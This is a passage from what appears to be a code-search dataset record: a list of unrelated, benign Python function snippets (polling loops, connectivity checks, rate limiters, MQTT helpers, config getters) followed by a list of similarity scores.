self._next_beat_t:\n self._next_beat_t = now + 60\n self.set_driver('ST', now, report=True)\n self.report_isycmd('DON')\n return True", "def polling_call(self) -> global___Snippet.ClientCall:", "def crawl_new_url(self):\n url_returned = self.obj_scheduler.get_next_url()\n \n if self.obj_scheduler.can_fetch_page(url_returned[0]):\n return None\n else:\n binary_content = self.request_url(url_returned[0])\n \n if binary_content != None:\n return self.discover_links(url_returned[0], url_returned[1], binary_content)\n else:\n return None", "def _do_connectivity(self, tstep):\n return ((tstep > 0) and (tstep % self.overset_update_interval) == 0)", "def fallback_to_ondemand(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"fallback_to_ondemand\")", "def wait_for_url(url, status_code=200, sleep_duration_seconds=1, iterations=120, message_frequency=15):\n for iteration in range(iterations):\n print(\".\", end='')\n sys.stdout.flush()\n response = requests.get(url)\n if response.status_code == status_code:\n print(\".\")\n return True\n sleep(sleep_duration_seconds)\n print(\".\")\n return False", "def check_connection(self, logger, config: Mapping[str, Any]) -> Tuple[bool, Any]:\n try:\n # we use metrics endpoint because it never returns an error\n _ = list(Metrics(api_key=config[\"api_key\"]).read_records(sync_mode=SyncMode.full_refresh))\n except Exception as e:\n return False, repr(e)\n return True, None", "def IsReadyForRefresh(self, name):\n if(self.data[name]['GET']['refresh_countdown'] == 0x00):\n return True\n \n self.data[name]['GET']['refresh_countdown'] = self.data[name]['GET']['refresh_countdown'] - 1 \n return False", "def is_on(self):\n if self.is_update_locked():\n return self.graceful_state\n if 
self._state['action'] == 1 and self._state['state'] == 2:\n return True\n return False", "def check_completion(self):\n\n time.sleep(3)\n while self.status == 0:\n pass", "def poll(cls, context):\r\n return context.object.animation_data.action is not None", "def online_check(self):\n self.online = False\n online_topic = '{t_topic}/INFO2'.format(**self)\n print('{BLUE}Watching for {}{NC}'.format(online_topic, **colors))\n try:\n self.mqtt.connect(self.mqtt_host)\n except Exception:\n print('MQTT broker not online')\n return False\n\n self.mqtt.message_callback_add(online_topic, lambda *args: \\\n setattr(self, 'online', True))\n self.mqtt.subscribe(online_topic)\n startTime = dt.datetime.now()\n while not self.online and not too_old(startTime, wait_time):\n self.mqtt.loop(timeout=loop_time)\n time_waited = (dt.datetime.now() - startTime).total_seconds()\n # If we did not see device publish INFO2, sometimes platformio causes\n # a delay by checking for updates and we miss seeing this message.\n # To check for that case, query the device for its build timestamp and\n # check if it was built in the last couple minutes.\n if not self.online:\n self.query_tas_status()\n if 'build_time' in self.reported:\n build_time = dt.datetime.strptime(self.reported['build_time'],\n '%Y-%m-%dT%H:%M:%S')\n if dt.datetime.now() - build_time < dt.timedelta(minutes=2):\n self.online = True\n\n if not self.online:\n print('{RED}{f_name} did not come online within {wait_time} '\n 'seconds{NC}'.format(f_name=self.f_name,\n wait_time=str(wait_time),\n **colors))\n elif self.online:\n print('{GREEN}{f_name} came online in {time_waited} '\n 'seconds{NC}'.format(f_name=self.f_name,\n time_waited=time_waited,\n **colors))\n self.mqtt.unsubscribe(online_topic)\n self.mqtt.message_callback_remove(online_topic)\n self.mqtt.disconnect()\n return self.online", "def fan_timer_active(self) -> bool:\r\n self._logger.debug(log_message_formatter(\r\n \"get\", f\"{self}\", \"fan_timer_active\"))\r\n return datetime.fromisoformat(self.fan_timer_timeout) > datetime.now()", "def __call__(self, event):\n self.last = LOOP_TIME()\n if event.chunk_index + 1 != event.chunk_count:\n return False\n \n self.waiter.set_result_if_pending(True)\n timer = self.timer\n if (timer is not None):\n self.timer = None\n timer.cancel()\n \n return True", "def _stale_check_url(args):\n if not args.keep_scripts:\n return _GH_STALE_CHECK\n\n return None", "def __ensure_fetching_rate_limit(self) -> None:\n current = datetime.now()\n difference = current - self.fetched_last\n time_to_wait = FETCH_MINIMUM_WAIT_SECONDS - difference.total_seconds()\n if time_to_wait > 0:\n time.sleep(time_to_wait)\n\n self.fetched_last = datetime.now()", "def check_if_ok_to_update(self):\n current_time = int(time.time())\n last_refresh = self.last_refresh\n if last_refresh is None:\n last_refresh = 0\n if current_time >= (last_refresh + self.refresh_rate):\n return True\n return False", "def rate_limiting(cls):\n this_click_time = time.time()\n time_to_last_click = None\n if cls.last_click_time:\n time_to_last_click = this_click_time - cls.last_click_time\n cls.last_click_time = this_click_time\n return time_to_last_click and time_to_last_click < 0.7", "def check_loop(\n url, period=5, timeout=10, body_check_re='',\n producer=None, oneshot=False):\n while True:\n worker = threading.Thread(target=check, kwargs={\n 'url': url,\n 'timeout': timeout,\n 'body_check_re': body_check_re,\n 'producer': producer,\n })\n logger.info('check url=%s' % url)\n worker.start()\n 
time.sleep(period)\n if oneshot:\n return", "def check( log = False):\n return True", "def internet_on(): \n try:\n urlopen('http://www.google.com', timeout=2)\n return True\n except urlopen.URLError as err: \n return False", "def is_retryable(self) -> Optional[bool]:\n return pulumi.get(self, \"is_retryable\")", "def _iswaiting(self):\n return self._ison() or self._isstandby()" ]
[ "0.6179781", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.60813695", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.60036206", "0.59700084", "0.59700084", "0.59700084", "0.5922929", "0.5922929", "0.5922929", "0.5922929", "0.5922929", "0.5922929", "0.5922929", "0.58766496", "0.5829096", "0.56240463", "0.5593074", "0.55897635", "0.55557585", "0.5529277", "0.5488584", "0.54618543", "0.53944844", "0.5358611", "0.5317789", "0.52986324", "0.52652043", "0.5208374", "0.51787215", "0.51758015", "0.5143727", "0.513495", "0.5134206", "0.50979805", "0.50461066", "0.50425625", "0.5042184", "0.503387", "0.5024952", "0.50190115", "0.50159836", "0.49845278", "0.49806824", "0.49713758", "0.49435583", "0.4938417", "0.49363336", "0.49303222", "0.49218786", "0.49171567", "0.49025097", "0.48986983", "0.48981524", "0.48962694", "0.4892972", "0.48763204", "0.48685038", "0.4862226", "0.4861443", "0.4859878", "0.4831437", "0.48292214", "0.48254856", "0.48240402", "0.48226225" ]
0.0
-1
Implementation of TPMINVNOM00000 Step 1.1
def upload(version=minv.__version__, release="1"):
    version = version or minv.__version__
    put(
        join(
            env.builder_path,
            "build/RPMS/minv-%s-%s.noarch.rpm" % (version, release)
        ),
        ""
    )
    put("minv/package/minv_install_postgresql.sh", "")
    sudo("chmod a+x minv_install_postgresql.sh")
    with lcd(env.ink_path):
        for rpm in RPMS:
            put(rpm, "")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTru(n,int_method,func) :\n m = np.asarray([0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,6,7,8,9,10])\n bes = np.asarray([-0.5,0,0.43675,0.47773,0.49231,0.49316,0.49280,0.50325,\n 0.51140,0.52169,0.55823,0.58086,0.60463,0.61483,0.66995])\n p = np.asarray([1,0,0.61007,0.77491,0.84071,0.87689,0.89914,0.91365,\n 0.92449,0.93279,0.94451,0.95289,0.95904,0.96385,\n 0.96731])\n h1 = np.asarray([0,0,-0.07257,-0.04963,-0.03313,-0.02282,-0.01648,\n -0.01248,-0.00970,-0.00773,-0.00522,-0.00369,-0.00272,\n -0.00206,-0.00164])\n h2 = np.asarray([0,0,-0.20048,-0.15556,-0.12070,-0.09611,-0.07919,\n -0.06747,-0.05829,-0.05106,-0.04060,-0.03311,-0.02768,\n -0.02353,-0.02053])\n h3 = np.asarray([0,0,0.01647,0.08284,0.14390,0.19680,0.24168,0.27969,\n 0.31280,0.34181,0.39002,0.42942,0.46208,0.48997,0.51325])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h1,int_h2,int_h3])", "def prove_NI() -> Proof:\n # Optional Task 6.7e", "def ftlan_E1c(hop, v0, T, m=50, Min_b=10e-10, Min_m=5, kB=1, norm = np.linalg.norm):\n# def Tri_diag(a1, b1):\n# mat = np.diag(b1, -1) + np.diag(a1, 0) + np.diag(b1, 1)\n# e, w = np.linalg.eigh(mat)\n# return e, w\n\n beta = 1./(T * kB)\n E = 0.\n a, b = [], []\n v0 = v0/norm(v0)\n Hv = hop(v0)\n a.append(v0.dot(Hv))\n v1 = Hv - a[0] * v0\n b.append(norm(v1))\n if b[0] < Min_b:\n return 0\n\n v1 = v1/b[0]\n Hv = hop(v1)\n a.append(v1.dot(Hv))\n\n for i in range(1, m - 1):\n v2 = Hv - b[i - 1] * v0 - a[i] * v1\n b.append(norm(v2))\n if abs(b[i]) < Min_b:\n b.pop()\n break\n\n v2 = v2/b[i]\n Hv = hop(v2)\n a.append(v2.dot(Hv))\n v0 = v1.copy()\n v1 = v2.copy()\n \n a = np.asarray(a)\n b = np.asarray(b)\n\n eps, phi = Tri_diag(a, b)\n l = len(eps)\n# Eo = eps[0]\n# eps = eps-Eo\n exp_eps = np.exp(-beta * eps)\n E = np.sum(exp_eps * eps * phi[0, :]**2.)\n Z = np.sum(exp_eps * phi[0, :]**2.)\n# for i in range(len(eps)):\n# E += exp_eps[i] * eps[i] * phi[0, i]**2\n\n# E = E + Eo\n# de = eps[:, np.newaxis] - eps\n# for i in range(l):\n# E += eps[i] * phi[0, i]**2./np.sum(np.exp(-beta*de[:l, i])*(phi[0, :l]**2.))\n return E, Z", "def TR_algo3(h, vd=2):\n ve = 0\n vd = 2\n p = [0]*N\n for i in range(M-1, -1, -1):\n w = [bit_component(h, i*N+ii) for ii in range(N)]\n #print(i, w)\n w = sum( [wx*2**j for j, wx in enumerate(w)] )\n #print(i, w, gc(w))\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(N):\n p[j] += bit_component(l, j) << i\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % N\n return p", "def cond_depend_tpm():\n # fmt: off\n tpm = np.array([\n [1.0, 0.0, 0.0, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n ])\n # fmt: on\n return tpm", "def prove_NN() -> Proof:\n # Optional Task 6.7c", "def tpm3_1_8_end_genomic():\n return \"TPM3\", \"NC_000001.11\", 154170399, 154170469, -1", "def tpm3_1_8_start_genomic():\n return \"TPM3\", \"NC_000001.11\", 154191901, 154192135, -1", "def system(p):\r\n\r\n C1, C2, C3, C4, C5, C6, C7, C8, \\\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22, \\\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34,\\\r\n C35, C36, C37, C38, C39, C40, C41, C42, C43, \\\r\n 
C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56 = p\r\n\r\n C = [C1, C2, C3, C4, C5, C6, C7, C8,\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22,\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34, C35, C36, C37,\r\n C38, C39, C40, C41, C42, C43,\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56]\r\n\r\n eqs = [C[i] * (Kd[i] + Rtot - sum(C)) + Etot[i] * (sum(C) - Rtot) for i in range(n)]\r\n\r\n return eqs", "def test_get_nveto_pmts(self):\n pass", "def stepFunction(Hin, m):\n if makeReport:\n reporter.addHeader2(\"stepFunction(%s,%s)\"%(hex(Hin), hex(m)))\n # step1. generating keys\n C2 = 0\n C3 = 0xff00ffff000000ffff0000ff00ffff0000ff00ff00ff00ffff00ff00ff00ff00\n C4 = 0\n U = Hin\n V = m\n W = U ^ V\n K1 = transformP(W)\n\n U = transformA(U)^C2\n V = transformA(transformA(V))\n W = U ^ V\n K2 = transformP(W)\n\n U = transformA(U)^C3\n V = transformA(transformA(V))\n W = U ^ V\n K3 = transformP(W)\n\n U = transformA(U)^C4\n V = transformA(transformA(V))\n W = U ^ V\n K4 = transformP(W)\n\n if makeReport:\n reporter.addBold(\"Generated keys:\")\n reporter.addList([hex(K1), hex(K2), hex(K3), hex(K4)])\n\n # step2. crypting tranformation\n Hin_cut = Hin # we need Hin for the next step, but this step cuts Hin\n h1 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h2 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h3 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h4 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n s1 = gost28147.cryptBlock(h1, K1)\n s2 = gost28147.cryptBlock(h2, K2)\n s3 = gost28147.cryptBlock(h3, K3)\n s4 = gost28147.cryptBlock(h4, K4)\n S = s4\n S = cryptBlocks.concat(S, s3, 64)\n S = cryptBlocks.concat(S, s2, 64)\n S = cryptBlocks.concat(S, s1, 64)\n if makeReport:\n reporter.addBold(\"Crypting transformation:\")\n reporter.addList([\n \"gost28147(%s,%s)=%s\"%(hex(h1),hex(K1),hex(s1)),\n \"gost28147(%s,%s)=%s\"%(hex(h2),hex(K2),hex(s2)),\n \"gost28147(%s,%s)=%s\"%(hex(h3),hex(K3),hex(s3)),\n \"gost28147(%s,%s)=%s\"%(hex(h4),hex(K4),hex(s4)),\n ])\n reporter.addBold(\"S=\"+hex(S))\n # Step 3. 
Shuffle transforming.\n Hout = transformPsi(S)\n for i in range(12):\n Hout = transformPsi(Hout)\n Hout = transformPsi(Hout ^ m)^Hin\n for i in range(61):\n Hout = transformPsi(Hout)\n return Hout", "def prove_CM() -> Proof:\n # Optional Task 6.7f", "def calcualte_inte_vn(pT_low, pT_high, data):\n npT = 50\n pT_inte_array = linspace(pT_low, pT_high, npT)\n dpT = pT_inte_array[1] - pT_inte_array[0]\n dN_event = data[:, 2]\n pT_event = data[:, 0]\n dN_interp = exp(interp(pT_inte_array, pT_event, log(dN_event+1e-30)))\n N_event = data[:, -1]\n N_interp = exp(interp(pT_inte_array, pT_event, log(N_event+1e-30)))\n N = sum(N_interp)*dpT/0.1\n temp_vn_array = [N,]\n for iorder in range(1, n_order):\n vn_real_event = data[:, 4*iorder]\n vn_imag_event = data[:, 4*iorder+2]\n vn_real_interp = interp(pT_inte_array, pT_event, vn_real_event)\n vn_imag_interp = interp(pT_inte_array, pT_event, vn_imag_event)\n vn_real_inte = (\n sum(vn_real_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_imag_inte = (\n sum(vn_imag_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_inte = vn_real_inte + 1j*vn_imag_inte\n temp_vn_array.append(vn_inte)\n return(temp_vn_array)", "def test_post_nveto_pmts(self):\n pass", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def gen_ep_data(self,ntrials,trlen):\n self.resort_emat()\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([x_encoding_input,x_test_input],1)\n # print('X',x_input)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n return i_input,s_input,yseq", "def gen_ep_data(self,ntrials,trlen):\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([i_encoding_input,x_test_input],1)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required 
for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n \n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n if return_trial_flag:\n tr_flag = np.concatenate([i*np.ones(self.nmaps+trlen) for i in range(ntrials)])\n tr_flag = tr.unsqueeze(tr.LongTensor(tr_flag),1)\n return tr_flag,i_input,s_input,yseq,\n else:\n return i_input,s_input,yseq", "def case():\r\n #ppc = {\"version\": '2'}\r\n ppc = {}\r\n ##----- Power Flow Data -----##\r\n ## system MVA base\r\n ppc[\"baseMVA\"] = 100.0\r\n\r\n ## bus data\r\n # bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin\r\n ppc[\"bus\"] = array([\r\n [1, 3, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [2, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [3, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [4, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [5, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [6, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [7, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [8, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [9, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [10, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [11, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [12, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [13, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [14, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [15, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [16, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0]\r\n ])\r\n\r\n ## generator data\r\n # bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,\r\n # Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf\r\n ppc[\"gen\"] = array([\r\n [1,\t0,\t0,\t10,\t-10,\t1.0224,\t100,\t1,\t10,\t-10,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0, 0, 0,0, 0, 0],\r\n [3 ,0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [5 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [10 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [13 ,0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [15 , 0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0]\r\n ])\r\n load_b = array([2, 4, 9, 12, 14])\r\n ppc[\"bus\"][load_b, 2] = multiply(array([-2.1125, -0.2231, -0.1664, -0.0719, -1.4633]).T, 0.03)\r\n ppc[\"bus\"][load_b, 3] = multiply(array([1.6492, 0.4054, 0.8599, 0.8845, 0.6778]).T, 0.03)\r\n ## branch data\r\n # fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax\r\n ppc[\"branch\"] = array([\r\n [1, 2, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 8, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 15, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 3, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, 
-360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 6, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 7, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [3, 4, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [4, 5, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 9, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 12, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 13, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 10, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 14, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [10, 11, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [15, 16, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0]\r\n ])\r\n R1 = 0.43\r\n L1 = 0.4e-3\r\n RS1 = 0.32\r\n LS1 = 0.39e-3\r\n Zbase = (0.4*0.4/100)\r\n branch_phase =array([\r\n [1, 1, 2, 188, R1, L1],\r\n [2, 1 ,8, 346, R1, L1],\r\n [3 ,1 ,15,501, R1 ,L1],\r\n [4, 2, 3, 130, RS1,LS1],\r\n [5, 2, 6, 145, RS1,LS1],\r\n [6, 2 ,7, 157, RS1,LS1],\r\n [7, 3, 4, 185, RS1,LS1],\r\n [8, 4, 5, 1000,RS1,LS1],\r\n [9, 8 ,9, 416, RS1,LS1],\r\n [10,8 ,12,130, RS1,LS1],\r\n [11,8 ,13,121, RS1,LS1],\r\n [12,9 ,10,130, RS1,LS1],\r\n [13,9 ,14,127, RS1,LS1],\r\n [14,10,11,251, RS1,LS1],\r\n [15,15,16,345, RS1,LS1]\r\n ])\r\n ppc[\"branch\"][:, [2,3]] = multiply(array([branch_phase[:, 4]*branch_phase[:, 3], branch_phase[:, 4]*branch_phase[:, 4]*100*pi]).T,0.001/Zbase)\r\n\r\n ##----- OPF Data -----##\r\n ## area data\r\n # area refbus\r\n\r\n\r\n ## generator cost data\r\n # 1 startup shutdown n x1 y1 ... xn yn\r\n # 2 startup shutdown n c(n-1) ... c0\r\n\r\n\r\n return ppc", "def prove_N() -> Proof:\n # Optional Task 6.8", "def N_TT_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_EB.__func__, \"integ\"):\n self.N_TT_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TB_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. 
#self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result *= self.F_TB(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TB_EE.__func__, \"integ\"):\n self.N_TB_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TB_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TB_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def ER_Theory(N,Kappa) :\n\tMu2 = Kappa - ( 2*Kappa*(1.0 - (Kappa/N))*math.log(N) )**0.5 + (( (Kappa*(1.0 - (Kappa/N)))/math.log(N) )**0.5)*( math.log( (2*math.pi*math.log((N**2)/(2*math.pi))) ) - 0.5772)\n\treturn Mu2", "def N_TT_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = 